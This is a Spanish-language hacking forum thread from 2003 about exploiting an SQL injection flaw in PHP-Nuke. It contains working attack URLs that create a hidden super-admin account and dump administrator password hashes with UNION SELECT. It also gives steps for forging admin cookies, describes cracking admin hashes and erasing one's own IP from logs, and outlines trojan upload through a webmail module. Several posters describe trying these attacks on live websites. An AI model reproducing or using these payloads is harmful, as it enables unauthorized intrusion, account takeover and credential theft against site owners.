exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....

Iniciado por el-brujo, 10 Octubre 2003, 16:32 PM

0 Miembros y 2 Visitantes están viendo este tema.

[Ky3zZ]

A ver..  señores..  como lo puedo explicar de alguna manera.. para que no dañe la sensivilidad de los demas usuarios.. ??? ???

Quiero quedar unas cosas claras ok?  >:(

1º No me agregen al Messenger... porque les borrare...

2º Si me agregan al Messenger y lo primero que me dicen es... sabes hackar una pagina php-nuke?.. tambien los borrare...

3º Yo no soy ningun maestro de php-nuke ni de hacking o sea que no enseño a nadie.. por lo cual los que me agregen al Messenger y me digan que les enseñe... les borrare...

4º Esto es un Foro para compartir opiniones, para dibulgar lo que a uno le apetezca o lo que el foro permitar.. por lo cual los usuarios que no tengan ni idea.. que no digan que les enseñemos.. por favor.. aprender un pokito buscando en el foro o en otro sitios, que viene muy bien explicado... asi aprendimos los demas...

5º A todo esto.... Gracias por leer este comunicado.

Saludos
El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"

ins@no

hola e aprendido algo pero tengo una pregunta ¿cuando uno se mete a hackear una pagina php la ip de uno keda archivado en el db? se puede borrar o es mentira ??? ??? ???

WiNSoCk

Podria quedar archivado en la base de datos sí, pero normalmente por si solo el nuke, aun que esta programado para ello, no lo hace.

Sí, queda registrado en los archivos de la empresa de host, y el 90% no tiene ni p**a idea de como mirarlo (digo los admins eh? asike ya imagina los users)

Existe ya, programas para detectarte, los ataques...los cuales no sé como funcionan, no les he probado (no me aburro tanto).

Y respondiendo más concretamente a tu pregunta, si quedase en bd....Sí...existen formas de borrarlo...tal como haces una buskeda, puedes borrar...solo es saber...

Pero esto es como en mates, si 2 + 2 es 4, pero te cambian un jodido 2 por una letra...la has cagado...busca que koño es esa letra, osease que si te guardan los datos en un bd, aparte...la has cagado.

P.D: Odio las matematicas.

ins@no

 ;D bueno gracias.. pero como se puede borrar la db para sacar mis datos  :o

WiNSoCk

No lo sé...nunca me he puesto ha aprender php, bueno, exactamente esto trata del sql, y tampoco me he puesto, pero supongo que si miras la linea con la que atacas a la bd, seria algo asi: (Todo lo que viene acontinuación es inventado)

Search (o querry) tabla: nuke_authors mostrar all.

Si sabes algo de sql, fijate que algo tiene que estar haciendo la llamada para mostrar los datos de nuke_authors, o como se ponga, ahora solo deberias mirar para borrar, delete, del, rm, etc...

khera

Buenas a todos, antes que nada deciros que es la primera vez que posteo por aqui, pero no la primera vez que leo los posts. Cada vez que leo algun post me quedo alucinado con la de cosas que sabeis XD a ver si estudiando un dia yo tambien puedo saber tanto como algunos de por aqui...
(Ya se que han parcheado las nuevas versiones de PHP-Nuke pero yo os hablo de Post Nuke... y tiene pocos parches la url de la que hablo xD)
Bueno ahi va... A ver yo consegui la password md5 de un admin de una web a traves de un exploit publicado en waraxe. El problema es que la web no esta basada en PHP si no en Post Nuke (que tampoco es un problema) Ahora mismo ya llevo 2 dias intentando crackear la password con el Mdcrack pero tarda muchisimo, ya voy por 8 caracteres y no encuenta nada :_( ...tambien envie el hash a passcracking para ver si ellos lo consiguen antes que yo. Bueno el tema es que si este bug de inyeccion para PHP Nuke tambien sirve para Post Nuke... ya se que el topic dice... PHP Nuke con mayusculas y todo, pero cabe alguna posibilidad de que funcione con Post Nuke?! Gracias por adelantado ^^
PD: Ya que estamos, a veces el Mdcrack me da un error cuando lleva mucho rato tabajando, y es que cuando hago ^C para pausarlo, cuando me dice la Average de hashes por segundo, a veces el numero que muestra es negativo... es eso normal?

Ambolius

Los bugs en portales predefinidos, asi como en sus diferentes modulos se suelen basar en codigo que no comprueba errores; normalmente variables que no filtran caracteres especiales. Este codigo es diferente los distintos tipos de portales. Por lo que los bugs pueden ser muy parecidos, pero no iguales.
Un informático a otro:
- ¿Cuantos eran los Dálmatas?
- 101.
- Por el culo te la hinco.

Davidu

admin.php?op=AddAuthor&add_aid=un4m3&add_name=God&add_pwd=123456&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox |

esto crea usuario un4m3 pass 123456 y te crea una cuenta god

modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/* |
este te dise el admin y el pass md5, pa entrar como admin te registras un user, te bajas el mozilla entras con el mozilla y le das a k entre automaticamente asin te crea un cookie cojes el cookie i cambias tu hash base64 por el base64 del admin k es nombreadmin:hasmd5 lo codificas a base 64 y lo cambias por el k tienes tu en tus cookies, i al vereis k pone user_id lo cambiais por admin i a la k entrais a la web tais en la cuenta del admin

tokugawa

Las passwords cifradas en el nuke se encriptan con md5, a su vez este algoritmo de cifrado es de una sola via, es decir cifra, pero no decifra, para cifrar se utiliza una semilla, que se extrae de la misma password, esto lo hace practicamente indecifrable ya que para poder decifrarlo se necesita saber el password y sis sabes el password, para que decifrarlo?.

el Cain podria crackearlo, por fuerza bruta, con un diccionario de palabras.

ahora el modulo webmail del nuke(ya no lo trae incorporadp) encriptaba las password del mail, con un algoritmo hecho en php que utilizaba como semilla el nombre de usuario del mismo, este modulo tiene varios bugs y uno de los menos peligrosos, pero si utliles al momento de combinarlo con el uso de otros bugs, es que esas passwords se pueden descifrar facilemente, temniendo acceso a los correos de los usuarios del nuke que usaran el modulo webmail.

otro de los bugs que tenia, era que el archivo que permitia adjuntar archivos leia una variable contenida en la base de datos la cual le indicaba la ruta de donde estaban almacenados los archivos atachados, y manipulando variables se podia inclkuso extraer archivos sensibles, como el config.php o introducir un troyano hecho en php, que luego permitiera acceso via webftp a todo el contenido del sitio y si se keria, tambien se le podia dotar de la cualidad de acceder a la base de datos y respaldarla, o hacer cualkier otra cosa con la base de datos, ahora ya no distribuyen ese modulo con el nuke porque su codigo era demasiado inseguro.

Y por sobre lo de ser lamers o no, supongo que kien ocupa esos xploits, y se cree hacker por hacerlo sin sikiera saber porke suceden las cosas, o que hay detras de esa sentencia, supongo que lo es(no quiero herir suceptibilidades, pero es la triste realidad de muchos).

espero que con esto hayan aprendido algo, shaus
SLP.CL software libre para pymes, dominios gratis, manuales entra ya!!!!

Fosko

Hola. Bueno, a ver... Me he leído TODOS los mensajes de los foros sobre inyección SQL,y he probado todo lo que se dice en varias webs con versiones viejas de phpnuke, y no funciona nada. Yo tuve una web hace tiempo en phpnuke 7.3, con los últimos parches y aún así me la hackearon. Intentando comprender cómo lo hicieron vine aquí, y he intentado probar con alguna web sin intención de joderla para ver los pasos que siguieron.

He probado a poner las direcciones esas como

"admin.php?op=AddAuthor&add_aid=un4m3&add_name=God&add_pwd=123456&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox |"

y vamos, todo lo que se habla en este tema, pero nada. En los manuales no me entero de mucho (por no decir nada) y no logro hacer nada... Alguien podría dar algún programa o alguna directriz de cómo inyectar sql y que funcione? Os lo agradecería mucho. Por cierto, saberse la teoría es fácil, se puede decir: haz tal haz cual, pero si esa persona no lo ha probado dudo que funcione. Yo ya digo, no me funciona nada, me salen todo tipo de mensajes en las webs, páginas en blanco y un sinfin de contratiempos. Pues eso, si alguien me puede ayudar se lo agradecería muchísimo :D Saludossssss